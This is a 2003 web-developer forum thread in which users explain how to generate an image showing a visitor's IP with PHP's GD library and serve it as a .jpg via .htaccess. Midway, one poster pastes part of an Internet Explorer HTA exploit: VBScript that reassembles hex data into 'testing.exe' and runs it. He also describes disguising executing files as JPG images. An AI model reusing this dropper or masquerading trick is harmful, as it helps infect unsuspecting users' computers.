I saw some examples of picture showing on website, and actually it was PHP code... I wonder how it is done? Exampl of such stuff you can see here:
http://www.danasoft.com
check the picture on top... It will show your IP and some more info.. SO it has to be some PHP code.. But how did they convert it to JPG???
pyro
11-09-2003, 06:29 PM
It simply uses GD (http://us4.php.net/gd). I've had loads of fun with GD in PHP... :)
Extreme
11-09-2003, 06:51 PM
Very interesting.. However, I was only able to find this code...
Now, can you please post some code that would show some JPG picture, from "/images/pic.jpg" and would load a PHP code in a background from "/code/example.php". And without unneccessary stuff like $orange variable in my example. I think it is irelevant..
Also, for example, I wish to you use this code:
$IP = $HTTP_SERVER_VARS['REMOTE_ADDR'];
to be shown on the picture, but I was wondering if there is a way that this code is executed, but not visible on picture???
pyro
11-09-2003, 07:19 PM
I'm not exactly sure what you are asking... The src for the image needs to point to the .php file that generates it.
Extreme
11-09-2003, 08:11 PM
OK, I made three files:
1. I called it pic.jpg and here is it's code:
and 3rd, i my picture... viper.png.. When I putt it alll in same folder and browse "pic.jpg", I get only code listed from pic.jpg.. It doesn't work...
PunkSktBrdr01
11-09-2003, 08:45 PM
The file needs to have the .php extension. Also, you need to have the GD library installed on your server. Once that's all taken care of, try this:
<?php
header("Content-type: image/jpeg");
$string = $_SERVER['REMOTE_ADDR'];
$im = imagecreatefrompng("viper.png");
$orange = imagecolorallocate($im, 220, 210, 60);
$px = (imagesx($im) - 7.5 * strlen($string)) / 2;
imagestring($im, 3, $px, 9, $string, $orange);
imagejpeg($im);
imagedestroy($im);
?>
That should work correctly. Make sure GD is installed on the server, though. To show the image, use <img src="pic.php">.
pyro
11-09-2003, 08:46 PM
Try changing:
$string = $_GET['ip.php']; to:
$string = $_SERVER['REMOTE_ADDR'];
You can then delete ip.php.
Extreme
11-09-2003, 09:10 PM
Yeah, like I thought, it works... Because GD is implemented into all versions of PHP above 4.3 as I read...
Maybe I could name it JPG, but I would have to putt something in front like:
...so IE would recognize my pic.jpg as a PHP file, but I don't know what is content type for PHP file?? It probably is not "application/PHP"
Extreme
11-10-2003, 06:11 PM
Anyone know what is exact content type for PHP???
pyro
11-10-2003, 06:18 PM
application/x-httpd-php
Let me know if it works. I've never tried using it like this, so it'll be interesting to hear.
Extreme
11-10-2003, 08:00 PM
Well, I don't know why, but it doesn't work with PHP. When I make some test.jpg file and putt in it only this code
<?php include('pic.php'); ?>
it doesn't work... But it works with HTML partially when I putt this code and namne my file test.jpg
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY>
<!--#include file="pic.php" -->
</BODY></HTML>
But I don't think I have HTML includes available on my hosting, and that is why it doesn't work... I have some IE exploit that uses that stuff with HTA files... But I don't have enough knowledge to implement it into this example... I can upload this IE exploit file, and you can examine the code if you wish???
pyro
11-10-2003, 09:03 PM
IE exploits are really not useful, as they are simply browser bugs, that will hopefully be fixed, and very doubtfully work in other browsers.
Extreme
11-10-2003, 09:18 PM
Yes, but this has nothing to do with exploits.. I just got an idea to mask *.jpg file that way, by looking at some exploit.. I can ZIP it up and upload here... If you wish to take a look...
pyro
11-10-2003, 09:32 PM
Not sure what you want me to take a look at, but sure, if you upload it, I'll take a look.
.. now, as you see, file is called JPG, but after you execute it inside IE, the code inside it will stil be executed, because IE recognised that it was actually a HTML file, although I have puted JPG extension...
** This is content of badnewz2.php
function res(x,y)
For k = 0 To UBound(v)
v(k) = Replace(v(k), x, y)
Next
End Function
res "z", "FF"
res "y", "00"
piece = Split(cut, "/")
cc = 103
For n = 0 To UBound(piece) - 1
res Chr(cc), piece(n)
cc = cc + 1
Next
For m = 0 To UBound(v)
it = it & v(m)
Next
tmp = Split(it, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = "testing.exe"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
Set shell=CreateObject("WScript.Shell")
shell.run(pth)
</script>
...As you see here, there is a content type in the begging, which tricks IE into thinking that HTA file is actually a trustable PHP file.
Now. My point is to take example code from first post, and name t JPG instead of PHP, and so the code would still work...
Maybe you could find a way by examining what I pasted here.
DaiWelsh
11-11-2003, 10:30 AM
Did I miss the bit where you explained why the code had to be run as a .jpg?
Generally I would not expect Apache to process a .jpg looking for anything (even content type header) since (with default conf) it expects it to be a binary image and should just squirt it to the browser (however you seem to be suggesting it works for html in .jpg files so I am prepared to accept I could be wrong there).
If you want it to see .jpg as php then I would say configure Apache to see it that way using the conf file (if you dont want all jpgs to be affected I expect you can set this per directory though I am no expert).
While I understand that circumstances sometimes force strange measures it is generally best for yourself long term to work within the system not outside it and if .jpg is configured to be jpeg images then that is what they should be.
Extreme
11-11-2003, 12:11 PM
Well, wouldn't you like to point some file to JPG file, and on his suprise he sees some code, like "Your IP is ..." r something like that.. And no one will know how it was done.. Offcourse I have more better reasons, but probably not interesting to you...
DaiWelsh
11-11-2003, 05:05 PM
ok, just wanted to be sure that was a requirement not just that you assumed you had no choice :) Like I said if possible configure the webserver to handle jpg as php, may be able to set it in an .htaccess if the server is configured to allow overrides on a directory level.
Extreme
11-12-2003, 03:55 AM
Yeah, but unfortunetly, I don't have a way to configure server because I just have hosting that I bought online...
pyro
11-12-2003, 06:46 AM
Try Dia's second suggestion, the .htaccess file. Make a .htaccess file and throw this line into it:
AddType application/x-httpd-php .php .jpg
Extreme
11-12-2003, 04:48 PM
You mean, I should just putt a new .htaces file into directory where my picture is???
SHould I namee it somehow like name.htaccess or should I just name it .htacess?
DaiWelsh
11-12-2003, 05:53 PM
yes, put it in the same dir as your php image generation script and just call it .htaccess as this is a special reserved name that apache web server uses for configuration settings. If you are lucky these settings will override the defaults for that directory, if you are unlucky your host will have set the overall apache configuration to disallow this. Worth a try though :)
webdeveloper.com
Copyright Internet.com Inc., All Rights Reserved.